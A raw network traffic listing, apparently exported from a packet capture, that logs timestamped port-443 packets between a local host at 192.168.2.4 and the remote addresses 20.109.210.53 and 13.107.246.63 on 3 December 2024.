                                                                        Dec 3, 2024 17:50:22.263415098 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:22.263418913 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.486149073 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:22.486224890 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:22.487942934 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:22.487951994 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:22.488198996 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:22.495887041 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:22.539339066 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.058428049 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.058470964 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.058495045 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.058567047 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.058590889 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.058645964 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.241978884 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.242007017 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.242168903 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.242197037 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.242238998 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.292844057 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.292897940 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.292946100 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.292973042 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.292989016 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.293028116 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.492389917 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.492418051 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.492515087 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.492537022 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.492585897 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.519607067 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.519623995 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.519695997 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.519706964 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.519748926 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.545475006 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.545504093 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.545542002 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.545548916 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.545579910 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.545593023 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.601578951 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.601604939 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.601702929 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.601711988 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.601756096 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.629220963 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.629244089 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.629321098 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.629331112 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.629379034 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.719938040 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.719960928 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.720071077 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.720087051 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.720165968 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.731709003 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.731725931 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.731787920 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.731801033 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.731857061 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.744821072 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.744837999 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.744899988 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.744909048 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.744949102 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.756891966 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.756913900 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.756973028 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.756980896 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.757028103 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.794478893 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.794498920 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.794579983 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.794589043 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.794665098 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.799684048 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.799761057 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.799767971 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.799820900 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.799890041 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.799913883 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.799928904 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.799935102 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.840521097 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.840533018 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.840600967 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.840631962 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.840682030 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.840722084 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.840920925 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.840936899 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.841053963 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.841092110 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.842447042 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.842454910 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.842515945 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.842628956 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.842633009 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.843566895 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.843605995 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.843672991 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.844151974 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.844168901 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.844228029 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.844296932 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.844322920 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:23.844398975 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:23.844410896 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.605164051 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.605762959 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.605787992 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.606276989 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.606281996 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.642371893 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.643217087 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.643273115 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.644479036 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.644493103 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.699296951 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.699922085 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.699964046 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.701240063 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.701251984 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.701291084 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.701652050 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.701675892 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.702747107 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.702752113 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.717135906 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.717498064 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.717504025 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:25.718612909 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:25.718616009 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.046463966 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.046494007 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.046555996 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.046602011 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.046636105 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.046900988 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.046921015 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.046956062 CET49780443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.046962023 CET4434978013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.051848888 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.051908970 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.051992893 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.052200079 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.052213907 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.086849928 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.086931944 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.087037086 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.087276936 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.087297916 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.087327003 CET49777443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.087333918 CET4434977713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.090370893 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.090399981 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.090486050 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.090666056 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.090673923 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.155762911 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.155833006 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.155916929 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.156136036 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.156136036 CET49779443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.156184912 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.156213999 CET4434977913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.159131050 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.159181118 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.159451008 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.159451008 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.159485102 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.178114891 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.178169012 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.178245068 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.178267956 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.178296089 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.178319931 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.178363085 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.178410053 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.178421974 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.178433895 CET49778443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.178438902 CET4434977813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.180844069 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.180882931 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.181096077 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.181277990 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.181288004 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.713987112 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.714020014 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.714160919 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.714195013 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.714243889 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.714422941 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.714427948 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.714442015 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.714608908 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.714637041 CET4434977613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.714672089 CET49776443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.717190027 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.717242956 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:26.717319965 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.717453957 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:26.717468023 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:27.949836016 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:27.950459957 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:27.950494051 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:27.950870037 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:27.950874090 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:27.981278896 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:27.981950045 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:27.981965065 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:27.982538939 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:27.982542992 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.057343960 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.057948112 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.057982922 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.058351040 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.058356047 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.088857889 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.089489937 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.089521885 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.089952946 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.089960098 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.398309946 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.398386002 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.398446083 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.398608923 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.398628950 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.398641109 CET49781443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.398648024 CET4434978113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.401237011 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.401282072 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.401370049 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.401493073 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.401506901 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.429743052 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.429817915 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.429892063 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.430179119 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.430195093 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.430210114 CET49782443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.430216074 CET4434978213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.433427095 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.433479071 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.433572054 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.433774948 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.433785915 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.501795053 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.501885891 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.501967907 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.502197981 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.502217054 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.502227068 CET49784443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.502233028 CET4434978413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.505304098 CET49789443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.505354881 CET4434978913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.505451918 CET49789443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.505599976 CET49789443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.505615950 CET4434978913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.542928934 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.543026924 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.543087006 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.543219090 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.543239117 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.543248892 CET49783443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.543255091 CET4434978313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.545670986 CET49790443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.545767069 CET4434979013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.545870066 CET49790443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.546005011 CET49790443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.546052933 CET4434979013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.594723940 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.595383883 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.595426083 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:28.596029997 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:28.596043110 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:29.039973021 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:29.040062904 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:29.040146112 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:29.040384054 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:29.040385008 CET49785443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:29.040436029 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:29.040467024 CET4434978513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:29.043750048 CET49791443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:29.043790102 CET4434979113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:29.043878078 CET49791443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:29.044035912 CET49791443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:29.044048071 CET4434979113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.186610937 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.187221050 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.187249899 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.187709093 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.187715054 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.250431061 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.250958920 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.250993013 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.251440048 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.251445055 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.298223019 CET4434978913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.298707008 CET49789443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.298749924 CET4434978913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.299179077 CET49789443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.299187899 CET4434978913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.341989040 CET4434979013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.342529058 CET49790443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.342561960 CET4434979013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.342978001 CET49790443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.342982054 CET4434979013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.623226881 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.623306990 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.623389959 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.623704910 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.623729944 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.623742104 CET49788443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.623748064 CET4434978813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.627110958 CET49792443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.627146959 CET4434979213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.627233028 CET49792443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.627414942 CET49792443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.627425909 CET4434979213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.705245972 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.705322981 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.705391884 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.705667019 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.705686092 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.705698013 CET49787443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.705703020 CET4434978713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.708751917 CET49793443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.708780050 CET4434979313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.708875895 CET49793443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.709038973 CET49793443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:30.709048986 CET4434979313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.752518892 CET4434978913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:30.752623081 CET4434978913.107.246.63192.168.2.4
